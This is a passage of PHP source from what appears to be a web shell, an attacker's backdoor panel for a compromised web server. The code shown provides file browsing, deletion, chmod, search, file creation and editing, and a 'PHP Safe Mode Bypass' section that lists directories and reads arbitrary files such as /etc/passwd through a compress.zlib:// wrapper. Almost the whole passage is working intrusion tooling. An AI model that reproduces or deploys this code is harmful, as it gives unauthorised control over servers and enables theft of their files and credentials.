  2103. while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
  2104. closedir($h);
  2105. }
  2106. else {}
  2107. }
  2108. if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
  2109. else
  2110. {
  2111. //Building array
  2112. $objects = array();
  2113. $vd = "f"; //Viewing mode
  2114. if ($vd == "f")
  2115. {
  2116. $objects["head"] = array();
  2117. $objects["folders"] = array();
  2118. $objects["links"] = array();
  2119. $objects["files"] = array();
  2120. foreach ($list as $v)
  2121. {
  2122. $o = basename($v);
  2123. $row = array();
  2124. if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
  2125. elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
  2126. elseif (is_dir($v))
  2127. {
  2128. if (is_link($v)) {$type = "LINK";}
  2129. else {$type = "DIR";}
  2130. $row[] = $v;
  2131. $row[] = $type;
  2132. }
  2133. elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
  2134. $row[] = filemtime($v);
  2135. if (!$win)
  2136. {
  2137. $ow = posix_getpwuid(fileowner($v));
  2138. $gr = posix_getgrgid(filegroup($v));
  2139. $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
  2140. }
  2141. $row[] = fileperms($v);
  2142. if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
  2143. elseif (is_link($v)) {$objects["links"][] = $row;}
  2144. elseif (is_dir($v)) {$objects["folders"][] = $row;}
  2145. elseif (is_file($v)) {$objects["files"][] = $row;}
  2146. $i++;
  2147. }
  2148. $row = array();
  2149. $row[] = "<b>Name</b>";
  2150. $row[] = "<b>Size</b>";
  2151. $row[] = "<b>Modify</b>";
  2152. if (!$win)
  2153. {$row[] = "<b>Owner/Group</b>";}
  2154. $row[] = "<b>Perms</b>";
  2155. $row[] = "<b>Action</b>";
  2156. $parsesort = parsesort($sort);
  2157. $sort = $parsesort[0].$parsesort[1];
  2158. $k = $parsesort[0];
  2159. if ($parsesort[1] != "a") {$parsesort[1] = "d";}
  2160. $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
  2161. $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
  2162. $row[$k] .= $y;
  2163. for($i=0;$i<count($row)-1;$i++)
  2164. {
  2165. if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
  2166. }
  2167. $v = $parsesort[0];
  2168. usort($objects["folders"], "tabsort");
  2169. usort($objects["links"], "tabsort");
  2170. usort($objects["files"], "tabsort");
  2171. if ($parsesort[1] == "d")
  2172. {
  2173. $objects["folders"] = array_reverse($objects["folders"]);
  2174. $objects["files"] = array_reverse($objects["files"]);
  2175. }
  2176. $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
  2177. $tab = array();
  2178. $tab["cols"] = array($row);
  2179. $tab["head"] = array();
  2180. $tab["folders"] = array();
  2181. $tab["links"] = array();
  2182. $tab["files"] = array();
  2183. $i = 0;
  2184. foreach ($objects as $a)
  2185. {
  2186. $v = $a[0];
  2187. $o = basename($v);
  2188. $dir = dirname($v);
  2189. if ($disp_fullpath) {$disppath = $v;}
  2190. else {$disppath = $o;}
  2191. $disppath = str2mini($disppath,60);
  2192. if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
  2193. elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
  2194. foreach ($regxp_highlight as $r)
  2195. {
  2196. if (ereg($r[0],$o))
  2197. {
  2198. if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; cyb3rexit();}
  2199. else
  2200. {
  2201. $r[1] = round($r[1]);
  2202. $isdir = is_dir($v);
  2203. if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
  2204. {
  2205. if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
  2206. $disppath = $r[2].$disppath.$r[3];
  2207. if ($r[4]) {break;}
  2208. }
  2209. }
  2210. }
  2211. }
  2212. $uo = urlencode($o);
  2213. $ud = urlencode($dir);
  2214. $uv = urlencode($v);
  2215. $row = array();
  2216. if ($o == ".")
  2217. {
  2218. $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
  2219. $row[] = "LINK";
  2220. }
  2221. elseif ($o == "..")
  2222. {
  2223. $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
  2224. $row[] = "LINK";
  2225. }
  2226. elseif (is_dir($v))
  2227. {
  2228. if (is_link($v))
  2229. {
  2230. $disppath .= " => ".readlink($v);
  2231. $type = "LINK";
  2232. $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
  2233. }
  2234. else
  2235. {
  2236. $type = "DIR";
  2237. $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
  2238. }
  2239. $row[] = $type;
  2240. }
  2241. elseif(is_file($v))
  2242. {
  2243. $ext = explode(".",$o);
  2244. $c = count($ext)-1;
  2245. $ext = $ext[$c];
  2246. $ext = strtolower($ext);
  2247. $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
  2248. $row[] = view_size($a[1]);
  2249. }
  2250. $row[] = date("d.m.Y H:i:s",$a[2]);
  2251. if (!$win) {$row[] = $a[3];}
  2252. $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
  2253. if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
  2254. else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
  2255. if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;}
  2256. else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;}
  2257. if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
  2258. elseif (is_link($v)) {$tab["links"][] = $row;}
  2259. elseif (is_dir($v)) {$tab["folders"][] = $row;}
  2260. elseif (is_file($v)) {$tab["files"][] = $row;}
  2261. $i++;
  2262. }
  2263. }
  2264. // Compiling table
  2265. $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
  2266. echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#15354c borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
  2267. foreach($table as $row)
  2268. {
  2269. echo "<tr>\r\n";
  2270. foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
  2271. echo "</tr>\r\n";
  2272. }
  2273. echo "</table><br><hr size=\"1\" noshade><p align=\"right\">
  2274. <script>
  2275. function ls_setcheckboxall(status)
  2276. {
  2277. var id = 1;
  2278. var num = ".(count($table)-2).";
  2279. while (id <= num)
  2280. {
  2281. document.getElementById('actbox'+id).checked = status;
  2282. id++;
  2283. }
  2284. }
  2285. function ls_reverse_all()
  2286. {
  2287. var id = 1;
  2288. var num = ".(count($table)-2).";
  2289. while (id <= num)
  2290. {
  2291. document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
  2292. id++;
  2293. }
  2294. }
  2295. </script>
  2296. <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">
  2297. <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
  2298. if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
  2299. {
  2300. echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  2301. }
  2302. echo "<select name=act><option value=\"".$act."\">With selected:</option>";
  2303. echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
  2304. echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
  2305. if ($usefsbuff)
  2306. {
  2307. echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
  2308. echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
  2309. echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
  2310. }
  2311. echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
  2312. echo "</form><hr size=\"1\" noshade>";
  2313. }
  2314. ?>
  2315. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" borderColorLight=#c0c0c0 border=1>
  2316. <tr> <!-- 1 -->
  2317. <td valign="top" width="33%" ><p align="center"><b>:: PHP Safe Mode Bypass ::</b></p></td>
  2318. <td valign="top" width="33%" ><p align="center"><b>:: Make File/Directory ::</b></p></td>
  2319. <td valign="top" ><p align="center"><b>:: Go File/Directory ::</b></p></td>
  2320. </tr>
  2321. <tr><!-- 3 -->
  2322. <td valign="top">
  2323. <center><b>(: List Directories :)</b> <form action="<?php echo $surl; ?>">
  2324. <div align="center"><br>
  2325. Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br></div>
  2326. <?php
  2327. function rsg_glob()
  2328. {
  2329. $chemin=$_GET['directory'];
  2330. $files = glob("$chemin*");
  2331. echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
  2332. foreach ($files as $filename) {
  2333. echo "<pre>";
  2334. echo "$filename\n";
  2335. echo "</pre>";
  2336. }
  2337. }
  2338. if(isset($_GET['directory']))
  2339. {
  2340. rsg_glob();
  2341. }
  2342. ?>
  2343. </form></center>
  2344. </td>
  2345. <td>
  2346. <center><b>[: Make Directory :]</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center>
  2347. </td>
  2348. <td>
  2349. <center><b>{: Go Directory :}</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center>
  2350. </td>
  2351. </tr>
  2352. <tr><!-- 2 -->
  2353. <td valign="top">
  2354. <div align="center"><b>(: Read Files :)</b></div><br>
  2355. <form action="<?php echo $surl; ?>">
  2356. <div align="center">File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
  2357. <?php
  2358. function rsg_read()
  2359. {
  2360. $test="";
  2361. $temp=tempnam($test, "cx");
  2362. $file=$_GET['file'];
  2363. $get=htmlspecialchars($file);
  2364. echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
  2365. if(copy("compress.zlib://".$file, $temp)){
  2366. $fichier = fopen($temp, "r");
  2367. $action = fread($fichier, filesize($temp));
  2368. fclose($fichier);
  2369. $source=htmlspecialchars($action);
  2370. echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
  2371. unlink($temp);
  2372. } else {
  2373. die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
  2374. <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
  2375. access.</CENTER></FONT>");
  2376. }
  2377. echo "</div>";
  2378. }
  2379. if(isset($_GET['file']))
  2380. {
  2381. rsg_read();
  2382. }
  2383. ?>
  2384. <br>
  2385. </div>
  2386. </form>
  2387. </td>
  2388. <td >
  2389. <center><b>[: Make File :]</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center>
  2390. </td>
  2391. <td>
  2392. <center><b>{: Go File :}</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center>
  2393. </td>
  2394. </tr>
  2395. </table> <?php
  2396. }
  2397. if ($act == "delete")
  2398. {
  2399. $delerr = "";
  2400. foreach ($actbox as $v)
  2401. {
  2402. $result = FALSE;
  2403. $result = fs_rmobj($v);
  2404. if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
  2405. }
  2406. if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
  2407. $act = "ls";
  2408. }
  2409. if ($act == "chmod")
  2410. {
  2411. $mode = fileperms($d.$f);
  2412. if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
  2413. else
  2414. {
  2415. $form = TRUE;
  2416. if ($chmod_submit)
  2417. {
  2418. $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
  2419. if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
  2420. else {$err = "Can't chmod to ".$octet.".";}
  2421. }
  2422. if ($form)
  2423. {
  2424. $perms = parse_perms($mode);
  2425. echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
  2426. }
  2427. }
  2428. }
  2429. if ($act == "search")
  2430. {
  2431. echo "<b>Search in file-system:</b><br>";
  2432. if (empty($search_in)) {$search_in = $d;}
  2433. if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
  2434. if (empty($search_text_wwo)) {$search_text_regexp = 0;}
  2435. if (!empty($submit))
  2436. {
  2437. $found = array();
  2438. $found_d = 0;
  2439. $found_f = 0;
  2440. $search_i_f = 0;
  2441. $search_i_d = 0;
  2442. $a = array
  2443. (
  2444. "name"=>$search_name, "name_regexp"=>$search_name_regexp,
  2445. "text"=>$search_text, "text_regexp"=>$search_text_regxp,
  2446. "text_wwo"=>$search_text_wwo,
  2447. "text_cs"=>$search_text_cs,
  2448. "text_not"=>$search_text_not
  2449. );
  2450. $searchtime = getmicrotime();
  2451. $in = array_unique(explode(";",$search_in));
  2452. foreach($in as $v) {cyb3rfsearch($v);}
  2453. $searchtime = round(getmicrotime()-$searchtime,4);
  2454. if (count($found) == 0) {echo "<b>No files found!</b>";}
  2455. else
  2456. {
  2457. $ls_arr = $found;
  2458. $disp_fullpath = TRUE;
  2459. $act = "ls";
  2460. }
  2461. }
  2462. echo "<form method=POST>
  2463. <input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
  2464. <b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
  2465. <br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
  2466. <br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
  2467. <br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
  2468. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
  2469. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
  2470. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
  2471. <br><br><input type=submit name=submit value=\"Search\"></form>";
  2472. if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
  2473. }
  2474. if ($act == "fsbuff")
  2475. {
  2476. $arr_copy = $sess_data["copy"];
  2477. $arr_cut = $sess_data["cut"];
  2478. $arr = array_merge($arr_copy,$arr_cut);
  2479. if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
  2480. else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
  2481. }
  2482. if ($act == "d")
  2483. {
  2484. if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
  2485. else
  2486. {
  2487. echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
  2488. if (!$win)
  2489. {
  2490. echo "<tr><td><b>Owner/Group</b></td><td> ";
  2491. $ow = posix_getpwuid(fileowner($d));
  2492. $gr = posix_getgrgid(filegroup($d));
  2493. $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
  2494. }
  2495. echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
  2496. }
  2497. }
  2498. if ($act == "chmod")
  2499. {
  2500. $mode = fileperms($d.$f);
  2501. if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
  2502. else
  2503. {
  2504. $form = TRUE;
  2505. if ($chmod_submit)
  2506. {
  2507. $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
  2508. if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
  2509. else {$err = "Can't chmod to ".$octet.".";}
  2510. }
  2511. if ($form)
  2512. {
  2513. $perms = parse_perms($mode);
  2514. echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
  2515. }
  2516. }
  2517. }
  2518. if ($act == "f")
  2519. {
  2520. if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
  2521. {
  2522. if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
  2523. else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
  2524. }
  2525. else
  2526. {
  2527. $r = @file_get_contents($d.$f);
  2528. $ext = explode(".",$f);
  2529. $c = count($ext)-1;
  2530. $ext = $ext[$c];
  2531. $ext = strtolower($ext);
  2532. $rft = "";
  2533. foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
  2534. if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
  2535. if (empty($ft)) {$ft = $rft;}
  2536. $arr = array(
  2537. array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
  2538. array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
  2539. array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
  2540. array("Code","code"),
  2541. array("Session","phpsess"),
  2542. array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
  2543. array("SDB","sdb"),
  2544. array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
  2545. array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
  2546. array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
  2547. array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
  2548. array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
  2549. );
  2550. echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
  2551. foreach($arr as $t)
  2552. {
  2553. if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
  2554. elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
  2555. else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
  2556. echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
  2557. }
  2558. echo "<hr size=\"1\" noshade>";
  2559. if ($ft == "info")
  2560. {
  2561. echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
  2562. if (!$win)
  2563. {
  2564. echo "<tr><td><b>Owner/Group</b></td><td> ";
  2565. $ow = posix_getpwuid(fileowner($d.$f));
  2566. $gr = posix_getgrgid(filegroup($d.$f));
  2567. echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
  2568. }
  2569. echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
  2570. $fi = fopen($d.$f,"rb");
  2571. if ($fi)
  2572. {
  2573. if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
  2574. else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
  2575. $n = 0;
  2576. $a0 = "00000000<br>";
  2577. $a1 = "";
  2578. $a2 = "";
  2579. for ($i=0; $i<strlen($str); $i++)
  2580. {
  2581. $a1 .= sprintf("%02X",ord($str[$i]))." ";
  2582. switch (ord($str[$i]))
  2583. {
  2584. case 0: $a2 .= "<font>0</font>"; break;
  2585. case 32:
  2586. case 10:
  2587. case 13: $a2 .= "&nbsp;"; break;
  2588. default: $a2 .= htmlspecialchars($str[$i]);
  2589. }
  2590. $n++;
  2591. if ($n == $hexdump_rows)
  2592. {
  2593. $n = 0;
  2594. if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
  2595. $a1 .= "<br>";
  2596. $a2 .= "<br>";
  2597. }
  2598. }
  2599. //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
  2600. echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
  2601. }
  2602. $encoded = "";
  2603. if ($base64 == 1)
  2604. {
  2605. echo "<b>Base64 Encode</b><br>";
  2606. $encoded = base64_encode(file_get_contents($d.$f));
  2607. }
  2608. elseif($base64 == 2)
  2609. {
  2610. echo "<b>Base64 Encode + Chunk</b><br>";
  2611. $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
  2612. }
  2613. elseif($base64 == 3)
  2614. {
  2615. echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
